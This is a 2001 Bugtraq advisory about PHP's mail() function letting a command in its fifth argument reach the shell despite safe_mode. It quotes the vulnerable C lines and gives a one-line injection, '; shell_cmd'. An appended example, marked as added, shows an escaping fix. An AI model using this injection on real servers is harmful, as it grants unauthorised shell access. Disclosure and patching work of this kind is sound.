Bugtraq mailing list archives

php mail function bypass safe_mode restriction


From: Laurent Sintes <sintes () nfrance com>
Date: Wed, 18 Jul 2001 02:53:57 +0200

The PHP mail() function does not check for shell escape commands,
even if PHP is running in safe_mode.

So it may be possible to bypass the safe_mode restriction and gain
shell access.

Affected:
php4.0.6
php4.0.5

Significant lines of ext/standard/mail.c:

extra_cmd = (*argv[4])->value.str.val;
strcat (sendmail_cmd, extra_cmd);
sendmail = popen(sendmail_cmd, "w");

Exploit:
mail("toto () toto com",
         "test",
         "test",
         "test",
        "; shell_cmd"); 

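Added example, not part of the original post and not the PHP project's code: a hardened counterpart to the strcat()/popen() lines quoted above, which backslash-escapes shell metacharacters in the extra parameter and builds the command with bounds checks. The function names, buffer sizes and the sendmail path are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Shell metacharacters; each is backslash-escaped so it cannot end or chain the command. */
static const char SHELL_META[] = "#&;`|*?~<>^()[]{}$\\\n\"'";

/* Copy src into dst with metacharacters escaped. Returns 0, or -1 if dst is too small. */
int escape_shell_arg(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    if (dstlen == 0)
        return -1;
    for (; *src; src++) {
        int meta = strchr(SHELL_META, *src) != NULL;
        if (o + (meta ? 2 : 1) >= dstlen)   /* keep room for the terminating NUL */
            return -1;
        if (meta)
            dst[o++] = '\\';
        dst[o++] = *src;
    }
    dst[o] = '\0';
    return 0;
}

/* Build "<sendmail_path> <escaped extra_cmd>" with snprintf() instead of an unchecked strcat(). */
int build_sendmail_cmd(const char *sendmail_path, const char *extra_cmd,
                       char *out, size_t outlen)
{
    char escaped[512];
    int n;
    if (escape_shell_arg(extra_cmd, escaped, sizeof escaped) != 0)
        return -1;
    n = snprintf(out, outlen, "%s %s", sendmail_path, escaped);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    char cmd[256];
    /* Constructed input: the fifth-argument string from the report; the path is an assumed default. */
    if (build_sendmail_cmd("/usr/sbin/sendmail -t -i", "; shell_cmd", cmd, sizeof cmd) == 0)
        printf("%s\n", cmd);   /* the string that would be handed to popen() */
    return 0;
}
```

Escaping only stops the string from chaining a second command; the caller can still pass extra options to the mailer, so a restricted mode also has to decide whether to accept the parameter at all.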
